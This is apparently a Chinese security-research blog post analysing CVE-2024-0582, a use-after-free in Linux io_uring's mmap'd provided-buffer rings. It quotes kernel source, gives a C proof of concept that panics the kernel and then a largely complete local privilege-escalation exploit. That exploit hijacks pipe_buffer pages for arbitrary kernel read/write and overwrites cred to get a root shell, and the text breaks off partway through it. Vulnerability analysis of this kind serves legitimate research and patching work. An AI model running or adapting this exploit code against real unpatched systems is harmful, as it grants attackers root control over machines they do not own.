0x00. 一切开始之前
CVE-2024-0582 是一个发生在 Linux kernel 的 io_uring 这一高性能异步 IO API 中的漏洞:由于使用 IORING_REGISTER_PBUF_RING
注册的 ring buffer 在 mmap()
映射的情况下存在释放后仍可被访问的问题,攻击者可以利用该 UAF 漏洞攻击内核以完成本地提权;该漏洞的 CVSS 分数为 7.8
,影响版本包括但不限于 6.4~6.6.5
,本文我们选用 6.4
版本的内核源码进行分析
在开始之前,我们简要介绍 IO_URING
相关的基础知识
io_uring 简介
io_uring 是自内核版本 5.1 引入的全新的高性能异步 I/O 框架,相比于 Linux 原有的 Native AIO 而言有着近乎跨越时代的性能提升,尤其是在延迟和 IOPS 的表现上已经远远超越了 AIO,达到了媲美 SPDK 的性能(参考了很多 SPDK 内部设计),是一项革命性的新技术
io_uring
的核心数据结构为两个单向环形队列:
- 提交队列(submission queue,SQ):请求提交方在该队列中放入 I/O 请求,由接收方取出请求进行处理
- 完成队列(completion queue,CQ):请求接收方在完成 I/O 请求后在该队列中放入处理结果,请求提交方通过读取该队列获取结果

io_uring
架构引入了三个新的系统调用:
io_uring_setup()
:创建 io_uring
上下文,主要是创建一个 SQ 队列与一个 CQ 队列,并指定 queue 的元素数量;该系统调用会返回一个文件描述符以供我们进行后续操作
io_uring_register()
:操作用于异步 I/O 的文件或用户缓冲区(files or user buffers),主要有注册(在内核中创建新的缓冲区)、更新(更新缓冲区内容)、注销(释放缓冲区)等操作,已经注册的缓冲区大小无法调整
io_uring_enter()
:提交新的 I/O 请求,可以选择是否等待 I/O 完成
PBUF_RING Internal
对于 io_uring_register()
,其系统调用原型如下:
SYSCALL_DEFINE4(io_uring_register, unsigned int, fd, unsigned int, opcode,
void __user *, arg, unsigned int, nr_args)
在其核心逻辑的 __io_uring_register() 函数当中有一个大的 switch
来为不同的 opcode 调用不同的处理函数,我们主要关注于与 PBUF_RING
相关的部分
I. 注册:IORING_REGISTER_PBUF_RING
对于这个漏洞我们主要关注当 opcode == IORING_REGISTER_PBUF_RING
的情况,该 opcode 意味着注册一个环形缓冲区,其最终会调用到 io_register_pbuf_ring() 函数:
/*
 * Handler for IORING_REGISTER_PBUF_RING: register a provided-buffer ring
 * for buffer group reg.bgid, either pinning user-supplied pages or (with
 * IOU_PBUF_RING_MMAP set) allocating kernel pages that user space will
 * later map via mmap().
 *
 * NOTE(review): quoted from Linux 6.4; the only change to the listing is
 * repairing the "&reg" arguments that HTML-entity decoding had mangled
 * into the "®" character.
 */
int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
	struct io_uring_buf_reg reg;
	struct io_buffer_list *bl, *free_bl = NULL;
	int ret;

	if (copy_from_user(&reg, arg, sizeof(reg)))
		return -EFAULT;

	/* reserved fields must be zero; only the MMAP flag is recognized */
	if (reg.resv[0] || reg.resv[1] || reg.resv[2])
		return -EINVAL;
	if (reg.flags & ~IOU_PBUF_RING_MMAP)
		return -EINVAL;

	if (!(reg.flags & IOU_PBUF_RING_MMAP)) {
		/* user provides the memory: non-NULL and page-aligned */
		if (!reg.ring_addr)
			return -EFAULT;
		if (reg.ring_addr & ~PAGE_MASK)
			return -EINVAL;
	} else {
		/* kernel allocates the memory: user must NOT pass an address */
		if (reg.ring_addr)
			return -EINVAL;
	}

	if (!is_power_of_2(reg.ring_entries))
		return -EINVAL;

	/* cannot disambiguate full vs empty due to head/tail size */
	if (reg.ring_entries >= 65536)
		return -EINVAL;

	/* lazily set up the static array used for low buffer-group ids */
	if (unlikely(reg.bgid < BGID_ARRAY && !ctx->io_bl)) {
		int ret = io_init_bl_list(ctx);
		if (ret)
			return ret;
	}

	bl = io_buffer_get_list(ctx, reg.bgid);
	if (bl) {
		/* if mapped buffer ring OR classic exists, don't allow */
		if (bl->is_mapped || !list_empty(&bl->buf_list))
			return -EEXIST;
	} else {
		free_bl = bl = kzalloc(sizeof(*bl), GFP_KERNEL);
		if (!bl)
			return -ENOMEM;
	}

	/* pin user pages, or take the kernel-allocation (mmap) path */
	if (!(reg.flags & IOU_PBUF_RING_MMAP))
		ret = io_pin_pbuf_ring(&reg, bl);
	else
		ret = io_alloc_pbuf_ring(&reg, bl);

	if (!ret) {
		bl->nr_entries = reg.ring_entries;
		bl->mask = reg.ring_entries - 1;
		io_buffer_add_list(ctx, bl, reg.bgid);
		return 0;
	}

	kfree(free_bl);
	return ret;
}
略过各种参数检查等,我们主要关注其核心逻辑:
这里的子标志位主要用来指示 ring buffer 的分配者,若设置了 IOU_PBUF_RING_MMAP
意味着由内核分配环形缓冲区的内存,之后用户态应用使用 mmap()
映射以访问:
/*
* Flags for IORING_REGISTER_PBUF_RING.
*
* IOU_PBUF_RING_MMAP: If set, kernel will allocate the memory for the ring.
* The application must not set a ring_addr in struct
* io_uring_buf_reg, instead it must subsequently call
* mmap(2) with the offset set as:
* IORING_OFF_PBUF_RING | (bgid << IORING_OFF_PBUF_SHIFT)
* to get a virtual mapping for the ring.
*/
enum {
IOU_PBUF_RING_MMAP = 1,
};
若未设置该标志位,则意味着由用户态程序提供对应的页面,此时内核会调用 io_pin_pages() 并最终调用 pin_user_pages() 完成这一操作
因为我们的漏洞出现在和 mmap()
相关的路径上,因此我们主要关注调用 io_alloc_pbuf_ring() 这一路径,该函数最终会调用 __get_free_pages()
分配空闲页面:
/*
 * Kernel-side allocator for an IOU_PBUF_RING_MMAP provided-buffer ring:
 * the kernel owns the pages, and user space later maps these exact pages
 * through mmap() on the io_uring fd.
 */
static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
struct io_buffer_list *bl)
{
gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP;
size_t ring_size;
void *ptr;
ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring);
/* raw page allocation — these pages are what get remapped to user space */
ptr = (void *) __get_free_pages(gfp, get_order(ring_size));
if (!ptr)
return -ENOMEM;
bl->buf_ring = ptr;
/* both flags select the mmap-path teardown in __io_remove_buffers() */
bl->is_mapped = 1;
bl->is_mmap = 1;
return 0;
}
分配的结构大概长这个样子:

II. 注销:IORING_UNREGISTER_PBUF_RING
有注册就有注销,有内存分配就有内存释放,注销 PBUF_RING
对应的 opcode 为 IORING_UNREGISTER_PBUF_RING
,内核会调用到 io_unregister_pbuf_ring() 进行处理:
/*
 * Handler for IORING_UNREGISTER_PBUF_RING: tear down the buffer ring for
 * group reg.bgid and free its pages immediately — even though user space
 * may still hold a live mmap() of them (the root cause of CVE-2024-0582).
 *
 * NOTE(review): quoted from Linux 6.4; "&reg" repaired from the mangled
 * "®" character.
 */
int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
	struct io_uring_buf_reg reg;
	struct io_buffer_list *bl;

	if (copy_from_user(&reg, arg, sizeof(reg)))
		return -EFAULT;
	if (reg.resv[0] || reg.resv[1] || reg.resv[2])
		return -EINVAL;
	if (reg.flags)
		return -EINVAL;

	bl = io_buffer_get_list(ctx, reg.bgid);
	if (!bl)
		return -ENOENT;
	if (!bl->is_mapped)
		return -EINVAL;

	/* releases the backing pages right away — UAF if mmap() is still live */
	__io_remove_buffers(ctx, bl, -1U);

	/* high bgids live in the xarray and are freed individually */
	if (bl->bgid >= BGID_ARRAY) {
		xa_erase(&ctx->io_bl_xa, bl->bgid);
		kfree(bl);
	}
	return 0;
}
不难看出其核心逻辑为:
在看 __io_remove_buffers() 之前,我们首先回去看 io_alloc_pbuf_ring() ,注意到 io_buffer_list
这些成员的赋值:
static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
struct io_buffer_list *bl)
{
/* ... */
bl->is_mapped = 1;
bl->is_mmap = 1;
因此在 __io_remove_buffers() 当中,我们会进入下面的路径将前面分配的页面释放掉:
static int __io_remove_buffers(struct io_ring_ctx *ctx,
struct io_buffer_list *bl, unsigned nbufs)
{
unsigned i = 0;
/* shouldn't happen */
if (!nbufs)
return 0;
if (bl->is_mapped) {
i = bl->buf_ring->tail - bl->head;
if (bl->is_mmap) {
struct page *page;
page = virt_to_head_page(bl->buf_ring);
if (put_page_testzero(page))
free_compound_page(page);
bl->buf_ring = NULL;
bl->is_mmap = 0;
} /* ... */
}
在后面的版本中释放页面的逻辑会从使用 put_page_testzero()
换成 folio_put(virt_to_folio(bl->buf_ring));
,因此在修复该漏洞的 commit 当中你看到的是去除掉了 folio_put()
函数,但本质上的逻辑是一样的
III. 使用:io_uring_mmap
我们如何从用户空间访问 io_alloc_pbuf_ring() 分配的内存?内核通过 mmap()
为我们提供了一个方便快捷的途径,当我们对一个 io_uring
的 fd 使用 mmap()
进行映射时,内核最终会调用到 io_uring_mmap() 函数:
/*
 * .mmap handler for an io_uring fd: resolve the requested offset to the
 * backing kernel buffer, then map its physical frames into the user VMA.
 */
static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
{
size_t sz = vma->vm_end - vma->vm_start;
unsigned long pfn;
void *ptr;
/* decode vm_pgoff and look up the kernel-side buffer it refers to */
ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz);
if (IS_ERR(ptr))
return PTR_ERR(ptr);
/* remap the raw physical frames straight into user space */
pfn = virt_to_phys(ptr) >> PAGE_SHIFT;
return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
}
//...
static const struct file_operations io_uring_fops = {
.release = io_uring_release,
.mmap = io_uring_mmap,
在 io_uring_validate_mmap_request() 函数中首先会根据 mmap()
的 offset
参数判断具体操作,这里我们也可以看出对于 io_uring
而言 mmap()
的最后一个参数并非传统的用来表示偏移值,而是使用高位数据作为 mask 表示不同类型,低位存储具体数据,这里我们主要关注和 PBUF_RING
相关的分支:
/*
 * Translate an io_uring mmap() offset into the kernel buffer it names.
 * The offset is not a byte offset: its high bits (IORING_OFF_MMAP_MASK)
 * select the region type, the low bits carry region-specific data (for
 * PBUF_RING, the buffer-group id).
 */
static void *io_uring_validate_mmap_request(struct file *file,
loff_t pgoff, size_t sz)
{
struct io_ring_ctx *ctx = file->private_data;
loff_t offset = pgoff << PAGE_SHIFT;
struct page *page;
void *ptr;
/* Don't allow mmap if the ring was setup without it */
if (ctx->flags & IORING_SETUP_NO_MMAP)
return ERR_PTR(-EINVAL);
switch (offset & IORING_OFF_MMAP_MASK) {
case IORING_OFF_SQ_RING:
case IORING_OFF_CQ_RING:
ptr = ctx->rings;
break;
case IORING_OFF_SQES:
ptr = ctx->sq_sqes;
break;
case IORING_OFF_PBUF_RING: {
unsigned int bgid;
/* low bits of the offset encode the buffer-group id */
bgid = (offset & ~IORING_OFF_MMAP_MASK) >> IORING_OFF_PBUF_SHIFT;
mutex_lock(&ctx->uring_lock);
ptr = io_pbuf_get_address(ctx, bgid);
mutex_unlock(&ctx->uring_lock);
if (!ptr)
return ERR_PTR(-EINVAL);
break;
}
default:
return ERR_PTR(-EINVAL);
}
/* requested size must not exceed the backing (compound) page */
page = virt_to_head_page(ptr);
if (sz > page_size(page))
return ERR_PTR(-EINVAL);
return ptr;
}
io_pbuf_get_address 的逻辑就简单很多,主要就是取出我们前面分配的 buf_ring
:
/*
 * Look up the buffer list for `bgid` and return the kernel address of its
 * ring; NULL when the group doesn't exist or wasn't kernel-allocated
 * (i.e. not registered with IOU_PBUF_RING_MMAP).
 */
void *io_pbuf_get_address(struct io_ring_ctx *ctx, unsigned long bgid)
{
struct io_buffer_list *bl;
bl = io_buffer_get_list(ctx, bgid);
if (!bl || !bl->is_mmap)
return NULL;
return bl->buf_ring;
}
0x01. 漏洞分析
Root Cause
我们其实不难看出漏洞出现在对内存所有权的严格管控,当我们将 bl->buf_ring
的内存通过 mmap()
映射出去之后, 居然仍旧能够直接通过 io_unregister_pbuf_ring 函数将这块内存给释放掉 ,由此我们先进行内存分配、再进行 mmap()
、最后再释放这块内存就直接有一个 UAF 了: 我们可以通过 mmap() 的内存区域直接读写释放掉的内存页

Proof-Of-Concept
这里笔者给出自己写的 POC,主要就是利用 UAF 漏洞在 seq_file::seq_operations
里瞎写一通造成 kernel panic:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <liburing.h>
#include <sys/mman.h>
#include <sys/user.h>
#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif
#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif
#define SUCCESSS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"
/*
 * Pin the calling process to the given CPU core so per-CPU slab caches and
 * page allocations behave deterministically during the spray.
 * Fix vs. original: the return value of sched_setaffinity(2) is now
 * checked instead of being silently ignored.
 */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) < 0) {
        perror("[x] Unable to bind process to core");
        exit(EXIT_FAILURE);
    }
    printf(INFO_MSG("[*] Process binded to core: ") "%d\n", core);
}
/*
 * Register a kernel-allocated (IOU_PBUF_RING_MMAP) provided-buffer ring
 * under group id `bgid`, then mmap() it into our address space.
 * Returns the user-space mapping, or NULL with *retp set to the error.
 */
struct io_uring_buf_ring*
setup_pbuf_ring_mmap(struct io_uring *ring, unsigned int ring_entries,
int bgid, unsigned int flags, int *retp)
{
struct io_uring_buf_ring *buf_ring;
struct io_uring_buf_reg buf_reg;
size_t ring_size;
off_t offset;
int ret;
memset(&buf_reg, 0, sizeof(buf_reg));
/* we don't need to set reg.addr for IOU_PBUF_RING_MMAP */
buf_reg.ring_entries = ring_entries;
buf_reg.bgid = bgid;
buf_reg.flags = IOU_PBUF_RING_MMAP;
ret = io_uring_register_buf_ring(ring, &buf_reg, flags);
if (ret) {
puts(ERR_MSG("[x] Error occur while doing io_uring_register_buf_ring"));
*retp = ret;
return NULL;
}
/*
 * mmap offset encoding: the high bits select the PBUF_RING region, the
 * low bits carry the buffer-group id — decoded by the kernel in
 * io_uring_validate_mmap_request().
 */
offset = IORING_OFF_PBUF_RING | (uint64_t) bgid << IORING_OFF_PBUF_SHIFT;
ring_size = ring_entries * sizeof(struct io_uring_buf);
buf_ring = mmap(
NULL,
ring_size,
PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
ring->ring_fd,
offset
);
if (IS_ERR(buf_ring)) {
puts(ERR_MSG("[x] Error occur while doing mmap() for io_uring"));
*retp = PTR_ERR(buf_ring);
return NULL;
}
*retp = 0;
return buf_ring;
}
#define NR_PAGES 1
#define NR_BUFFERS 0x100
#define SEQ_FILE_NR 0x200
/*
 * CVE-2024-0582 proof of concept:
 *   1. register many IOU_PBUF_RING_MMAP buffer rings and mmap() each one;
 *   2. unregister them all — the kernel frees the pages while our user
 *      mappings stay alive (page-level UAF);
 *   3. spray seq_operations objects (open /proc/self/stat) so one lands
 *      in a freed page, leaking kernel pointers through the mapping;
 *   4. scribble over the leaked function pointers and trigger a read on
 *      the seq files to crash the kernel.
 */
void proof_of_concept(void)
{
struct io_uring ring;
void **buffers;
int seq_fd[SEQ_FILE_NR], found = 0;
int ret;
puts(SUCCESSS_MSG("-------- CVE-2024-0582 Proof-of-concet --------"));
puts(INFO_MSG("-------\t\t Author: ") "arttnba3" INFO_MSG(" \t-------"));
puts(SUCCESSS_MSG("-----------------------------------------------\n"));
puts(" Preparing...");
bind_core(0);
if (io_uring_queue_init(4, &ring, 0) < 0) {
perror(ERR_MSG("[x] Unable to init for io_uring queue"));
exit(EXIT_FAILURE);
}
/* stage 1: allocate pbuf rings and map each into user space */
puts(" Allocating pbuf ring and doing mmap()...");
buffers = calloc(NR_BUFFERS, sizeof(void*));
for (int i = 0; i < NR_BUFFERS; i++) {
buffers[i] = setup_pbuf_ring_mmap(
&ring,
NR_PAGES * PAGE_SIZE / sizeof(struct io_uring_buf),
i,
0,
&ret
);
if (ret) {
printf(
ERR_MSG("[x] Unable to set up") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
io_uring_buf_ring_init(buffers[i]);
}
/* stage 2: unregister everything — pages freed, mappings still live */
puts(" Triggering page-level UAF vulnerabilities...");
for (int i = 0; i < NR_BUFFERS; i++) {
ret = io_uring_unregister_buf_ring(&ring, i);
if (ret) {
printf(
ERR_MSG("[x] Unable to unregister") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
}
/* stage 3: spray seq_operations so one lands in a UAF page */
puts(" Reallocating page into seq_file::seq_operations...");
for (int i = 0; i < SEQ_FILE_NR; i++) {
if ((seq_fd[i] = open("/proc/self/stat", O_RDONLY)) < 0) {
printf(
ERR_MSG("[x] Unable to open") " No.%d "
ERR_MSG("seq file, error code: ") "%d\n",
i,
seq_fd[i]
);
exit(EXIT_FAILURE);
}
}
/* scan the stale mappings for leaked kernel-text pointers */
puts(" Checking data leak and overwriting...");
for (int i = 0; i < NR_BUFFERS; i++) {
uint64_t *buffer = buffers[i];
for (int j = 0; j < (NR_PAGES * PAGE_SIZE / sizeof(uint64_t)); j++) {
/* values in this range look like kernel .text addresses */
if (buffer[j]>0xffffffff80000000 && buffer[j]<0xfffffffff0000000) {
printf(
SUCCESSS_MSG("[+] Got kernel data leak:") " %lx "
SUCCESSS_MSG("at location ") "%d-%d\n",
buffer[j],
i,
j
);
/* corrupt the leaked function pointer */
buffer[j] = *(uint64_t*) "arttnba3";
found = 1;
goto out;
}
}
}
if (!found) {
puts(ERR_MSG("[x] Failed to reallocate UAF page as seq_operations!"));
exit(EXIT_FAILURE);
}
out:
/* stage 4: reading the seq files calls the clobbered pointer -> panic */
puts(" Triggering kernel panic...");
sleep(1);
for (int i = 0; i < SEQ_FILE_NR; i++) {
char buf[0x1000];
read(seq_fd[i], buf, 1);
}
puts("[?] So you're still alive here!?");
system("/bin/sh");
}
/* Entry point: the PoC needs no arguments, it just runs straight through. */
int main(int argc, char **argv, char **envp)
{
    (void) argc;
    (void) argv;
    (void) envp;
    proof_of_concept();
    return EXIT_SUCCESS;
}
运行,成功造成 kernel panic:

0x02. 漏洞利用
这个 UAF 可谓是相当的白给,其来自于非常常见的分配 page 的 API,并且可以在用户空间直接读写 UAF page,所以利用方式基本上可以说是多种多样的, 可谓是想怎么利用就怎么利用,而且还特别稳定
这里笔者直接用 page-level UAF 通过改写 pipe_buffer::page
的方式获取内核空间任意读写的权能,之后直接改写当前进程的 cred
结构体完成提权:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdarg.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <liburing.h>
#include <sys/mman.h>
#include <sys/user.h>
#include <sys/prctl.h>
#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif
#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif
#define SUCCESS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"
#define KASLR_GRANULARITY 0x10000000
#define KASLR_MASK (~(KASLR_GRANULARITY - 1))
uint64_t kernel_base, vmemmap_base, page_offset_base;
/*
 * Pin the calling process to the given CPU core so per-CPU slab caches and
 * page allocations behave deterministically during the spray.
 * Fix vs. original: the return value of sched_setaffinity(2) is now
 * checked instead of being silently ignored.
 */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) < 0) {
        perror("[x] Unable to bind process to core");
        exit(EXIT_FAILURE);
    }
    printf(INFO_MSG("[*] Process binded to core: ") "%d\n", core);
}
/*
 * Print a formatted error message, flush output, and terminate.
 * Fix vs. original: a va_list must be consumed with vprintf(); passing it
 * as a variadic argument to printf() is undefined behavior and printed
 * garbage instead of the formatted arguments. The unused local `ret` is
 * also removed.
 */
void err_exit(const char *fmt, ...)
{
    va_list args;

    va_start(args, fmt);
    vprintf(fmt, args);
    va_end(args);

    fflush(stdout);
    fflush(stderr);
    sleep(5);          /* leave the message on screen before dying */
    exit(EXIT_FAILURE);
}
void get_root_shell(void)
{
if(getuid()) {
puts(ERR_MSG("[x] Failed to get the root!"));
sleep(5);
exit(EXIT_FAILURE);
}
puts(SUCCESS_MSG("[+] Successful to get the root."));
puts(INFO_MSG(" Execve root shell now..."));
system("/bin/sh");
/* to exit the process normally, instead of potential segmentation fault */
exit(EXIT_SUCCESS);
}
/*
 * Register a kernel-allocated (IOU_PBUF_RING_MMAP) provided-buffer ring
 * under group id `bgid`, then mmap() it into our address space.
 * Returns the user-space mapping, or NULL with *retp set to the error.
 */
struct io_uring_buf_ring*
setup_pbuf_ring_mmap(struct io_uring *ring, unsigned int ring_entries,
int bgid, unsigned int flags, int *retp)
{
struct io_uring_buf_ring *buf_ring;
struct io_uring_buf_reg buf_reg;
size_t ring_size;
off_t offset;
int ret;
memset(&buf_reg, 0, sizeof(buf_reg));
/* we don't need to set reg.addr for IOU_PBUF_RING_MMAP */
buf_reg.ring_entries = ring_entries;
buf_reg.bgid = bgid;
buf_reg.flags = IOU_PBUF_RING_MMAP;
ret = io_uring_register_buf_ring(ring, &buf_reg, flags);
if (ret) {
puts(ERR_MSG("[x] Error occur while doing io_uring_register_buf_ring"));
*retp = ret;
return NULL;
}
/*
 * mmap offset encoding: the high bits select the PBUF_RING region, the
 * low bits carry the buffer-group id — decoded by the kernel in
 * io_uring_validate_mmap_request().
 */
offset = IORING_OFF_PBUF_RING | (uint64_t) bgid << IORING_OFF_PBUF_SHIFT;
ring_size = ring_entries * sizeof(struct io_uring_buf);
buf_ring = mmap(
NULL,
ring_size,
PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
ring->ring_fd,
offset
);
if (IS_ERR(buf_ring)) {
puts(ERR_MSG("[x] Error occur while doing mmap() for io_uring"));
*retp = PTR_ERR(buf_ring);
return NULL;
}
*retp = 0;
return buf_ring;
}
/**
* In my test environment, kmalloc-1k allocates from 4-page slub, so I chose 4.
* However, it might not be the same in your environment, e.g., it's 8 on my PC.
* Check your /proc/slabinfo before doing the exploitation.
*/
#define NR_PAGES 4
#define NR_BUFFERS 0x200
#define SEQ_FILE_NR 0x200
#define PIPE_SPRAY_NR 0x1F0
/*
 * Userland mirror of the kernel's struct pipe_buffer layout (as used here
 * against a 6.4 kernel), so the sprayed in-kernel pipe_buffer objects can
 * be read and rewritten through the UAF page mapping.
 */
struct pipe_buffer {
struct page *page; /* page holding this pipe segment's data — our R/W primitive */
unsigned int offset, len; /* valid data window inside the page */
const struct pipe_buf_operations *ops; /* kernel vtable pointer — leaks KASLR */
unsigned int flags;
unsigned long private;
};
/*
 * Head of the kernel's struct cred as laid out here: usage counter
 * followed by the eight ownership ids. Overwriting uid/gid with 0 via the
 * pipe primitive grants root.
 */
struct cred {
long usage; /* reference count */
uint32_t uid; /* real user id — 0 means root */
uint32_t gid; /* real group id */
uint32_t suid;
uint32_t sgid;
uint32_t euid; /* effective ids, checked on most permission tests */
uint32_t egid;
uint32_t fsuid;
uint32_t fsgid;
};
/*
 * Arbitrary kernel-page read: retarget the hijacked in-kernel pipe_buffer
 * (reachable through our UAF mapping) at `page`, mark it as holding data,
 * then drain the pipe's read end into `buf`. Exits on a short read.
 */
void read_kernel_page_by_pipe(struct page*page,struct pipe_buffer*kern_pipe_buf,
int pipe_fd[2], void *buf, size_t len)
{
    ssize_t nread;

    /* rewrite the kernel object before the read() syscall observes it */
    kern_pipe_buf->offset = 0;
    kern_pipe_buf->len = 0xffe;
    kern_pipe_buf->page = page;

    nread = read(pipe_fd[0], buf, len);
    if (nread != (ssize_t) len) {
        perror(ERR_MSG("[x] Unable to do reading on pipe"));
        exit(EXIT_FAILURE);
    }
}
/*
 * Arbitrary kernel-page write: retarget the hijacked in-kernel pipe_buffer
 * at `page`, make it look empty so the pipe accepts data at offset 0, then
 * push `buf` through the pipe's write end. Exits on a short write.
 */
void write_kernel_page_by_pipe(struct page *page,
struct pipe_buffer*kern_pipe_buf,
int pipe_fd[2], void *buf, size_t len)
{
    ssize_t written;

    /* an empty-looking buffer makes write() fill the page from offset 0 */
    kern_pipe_buf->offset = 0;
    kern_pipe_buf->len = 0;
    kern_pipe_buf->page = page;

    written = write(pipe_fd[1], buf, len);
    if (written != (ssize_t) len) {
        perror(ERR_MSG("[x] Unable to do writing on pipe"));
        exit(EXIT_FAILURE);
    }
}
/*
 * Full CVE-2024-0582 privilege escalation:
 *   1. build the page-level UAF (register + mmap + unregister pbuf rings,
 *      leaving gaps so pipe_buffer slabs can land in the freed pages);
 *   2. spray pipes so a pipe_buffer array is allocated inside a UAF page,
 *      then locate it from user space and derive vmemmap_base from the
 *      leaked page pointer;
 *   3. repoint the victim pipe_buffer at arbitrary physical pages to get
 *      kernel-memory read/write through plain pipe read()/write();
 *   4. scan physmap pages for our task_struct (by comm name), follow
 *      task->cred, and zero the uid/gid fields to become root.
 */
void exploit(void)
{
struct io_uring ring;
void **buffers;
struct pipe_buffer *kern_pipe_buffer = NULL;
uint64_t kernel_leak;
int pipe_fd[PIPE_SPRAY_NR][2], victim_idx = -1;
uint32_t uid, gid;
uint64_t cred_kaddr, cred_kpage_addr;
struct cred *cred_data;
char buf[0x1000];
int ret;
puts(SUCCESS_MSG("-------- CVE-2024-0582 Exploitation --------") "\n"
INFO_MSG("-------- Author: ")"arttnba3"INFO_MSG(" --------") "\n"
SUCCESS_MSG("-------- Local Privilege Escalation --------\n"));
bind_core(0);
puts(" Initializing io_uring ...");
if (io_uring_queue_init(4, &ring, 0) < 0) {
perror(ERR_MSG("[x] Unable to init for io_uring queue"));
exit(EXIT_FAILURE);
}
/* stage 1a: allocate pbuf rings and map each into user space */
puts(" Allocating pbuf ring and doing mmap() ...");
buffers = calloc(NR_BUFFERS, sizeof(void*));
for (int i = 0; i < NR_BUFFERS; i++) {
buffers[i] = setup_pbuf_ring_mmap(
&ring,
NR_PAGES * PAGE_SIZE / sizeof(struct io_uring_buf),
i,
0,
&ret
);
if (ret) {
printf(
ERR_MSG("[x] Unable to set up") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
io_uring_buf_ring_init(buffers[i]);
}
/* stage 1b: free every other ring — pages freed, mappings still live */
puts(" Triggering page-level UAF vulnerabilities ...");
for (int i = 0; i < NR_BUFFERS; i += 2) { /* we need "holes" between freed pages */
ret = io_uring_unregister_buf_ring(&ring, i);
if (ret) {
printf(
ERR_MSG("[x] Unable to unregister") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
}
/* stage 2a: spray pipes so pipe_buffer slabs reuse the freed pages */
puts(" Reallocating pages as pipe_buffers ...");
for (int i = 0; i < PIPE_SPRAY_NR; i++) {
if ((ret = pipe(pipe_fd[i])) < 0) {
printf(
ERR_MSG("[x] Unable to set up") " No.%d "
ERR_MSG("pipe, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
}
/* stage 2b: write to each pipe so pipe_buffer::page gets populated */
puts(" Allocating pipe_buffer::page ...");
for (int i = 0; i < PIPE_SPRAY_NR; i++) {
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], "arttnba3", 8);
}
/* scan the stale mappings for a pipe_buffer pattern: page ptr,
 * offset/len pair (0x20 << 32 | 0), then the ops vtable pointer */
puts(" Checking for UAF mmap address ...");
for (int i = 0; i < NR_BUFFERS; i += 2) {
uint64_t *buffer = buffers[i];
for (int j = 0; j < (NR_PAGES * PAGE_SIZE / sizeof(uint64_t)); j++) {
if (buffer[j] > 0xffff000000000000
&& buffer[j + 1] == 0x2000000000
&& buffer[j + 2] > 0xffffffff81000000) {
printf(
SUCCESS_MSG("[+] Got kernel pipe_buffer mapped at buffer:")
" %d-%d\n", i, j
);
printf(
INFO_MSG(" Leak pipe_buffer::page = ")"%lx\n", buffer[j]
);
printf(
INFO_MSG(" Leak pipe_buffer::ops = ")"%lx\n", buffer[j+2]
);
kern_pipe_buffer = (void*) &buffer[j];
goto out_find_pipe;
}
}
}
if (!kern_pipe_buffer) {
puts(ERR_MSG("[x] Failed to find kernel pipe_buffer in user space!"));
exit(EXIT_FAILURE);
}
out_find_pipe:
/* stage 3: turn the mapped pipe_buffer into an arbitrary-read oracle */
puts(" Overwriting victim pipe_buffer::page ...");
/* note that the granularity of KASLR is 256MB, i.e. 0x10000000*/
vmemmap_base = (uint64_t) kern_pipe_buffer->page & KASLR_MASK;
/* point it at the struct page of physical addr 0x9d000 (kernel text) */
kern_pipe_buffer->page = (void*) (vmemmap_base + 0x9d000 / 0x1000 * 0x40);
/* find which pipe fd owns the hijacked pipe_buffer: its data changed */
for (int i = 0; i < PIPE_SPRAY_NR; i++) {
read(pipe_fd[i][0], &kernel_leak, sizeof(kernel_leak));
if (kernel_leak != *(uint64_t*) "arttnba3") {
printf(SUCCESS_MSG("[+] Got victim pipe at idx: ") "%d\n", i);
victim_idx = i;
break;
}
}
if (victim_idx == -1) {
puts(ERR_MSG("[x] Failed to find the victim pipe!"));
exit(EXIT_FAILURE);
}
/* walk vmemmap downward until the read looks like kernel text
